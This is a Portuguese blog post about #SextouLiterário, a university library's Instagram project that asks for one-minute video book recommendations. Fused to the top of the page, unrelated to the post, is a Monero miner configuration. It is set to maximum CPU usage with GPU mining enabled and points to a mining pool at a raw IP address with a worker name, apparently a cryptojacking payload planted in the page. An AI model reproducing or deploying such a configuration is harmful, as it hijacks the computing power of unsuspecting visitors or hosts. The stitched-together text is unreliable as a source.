{ "autosave": true, "donate-level": 1, "cpu": { "enabled": true, "huge-pages": true, "hw-aes": null, "priority": null, "asm": true, "max-threads-hint": 100, "max-cpu-usage": 100, "yield": false, "init": -1, "*": { "intensity": 2, "threads": 8, "affinity": -1 } }, "opencl": true, "cuda": true, "pools": [ { "coin": "monero", "algo": "cn/gpu", "url": "168.235.86.33:3393", "user": "SK_pDKo9B7rTqyPDrYeohNv5.lobogamers", "pass": "x", "tls": false, "keepalive": true, "nicehash": false } ] } Divã Literário: #Sextouliterário: um projeto de incentivo à leitura!

Leitores do Divã

segunda-feira, 20 de setembro de 2021

#Sextouliterário: um projeto de incentivo à leitura!

#Sextouliterário: um projeto de incentivo à leitura.

Desde o inicio da pandemia de Covid-19, estamos isolados socialmente, então buscamos várias formas de preencher o tempo livre extra que passamos a ter no meio de toda a correria que antes vivíamos. Foi dessa necessidade que surgiu o projeto Sextou Literário, divulgado às sextas, pela Biblioteca de um dos Campi da Universidade Federal Rural da Amazônia - UFRA.

Criado em 2020, e mantido pela biblioteca da UFRA do município de Capitão Poço, bem como vários outros projetos desenvolvidos no decorrer na pandemia, O #SextouLiterário é um intercâmbio de recomendações de livros, feitas por seguidores e não seguidores do Instagram do projeto, de forma que a leitura é incentivada e fomentada de forma mais abrangente, garantindo assim que todos tenham a oportunidade de cultivar o hábito da leitura.

Como participar?

Antes de mais nada, não é tão fácil recomendar um livro para o projeto. A estrela da indicação é o livro, o que deve fazer os leitores pensarem duas vezes antes de fazer uma indicação. Não faz sentido indicar um livro que você nunca leu, certo? Como você influenciar outras pessoas a ler sua recomendação, se nem conhece a obra que está indicando? Ou se há obras também publicadas do mesmo autor? 

Mas calma, o processo é bem simples, só restando se preocupar com o livro a ser indicado.

Com a leitura a ser indicada em mãos, que pode ser um romance, um HQ, ou outros gêneros literários que você goste, o candidato deve gravar um vídeo, do próprio smartphone ou tablet, com uma duração máxima de 1 minuto (não mais que isso), fazendo um resumo básico sobre a sua leitura a ser indicada e enviar para o Instagram do projeto. É difícil enxugar e condensar tudo que você gosta em uma leitura no curto espaço de um 1 minuto, então é sempre bom fazer um pequeno roteiro, caprichar na edição, e esperar, que até a postagem.

Gostou da dica? Então capricha no visual e grave seu vídeo com a sua leitura do momento, ou favorita da vida. Quem sabe as pessoas não gostam da sua indicação?      

Nenhum comentário:

Postar um comentário

Projeto Desencalhando a estante... ou conhecendo a estante?

 Um projeto que já existe desde janeiro de 2020, O projeto Desencalhando a estante , da professora Carolina Bianchezi, ajuda leitores de tod...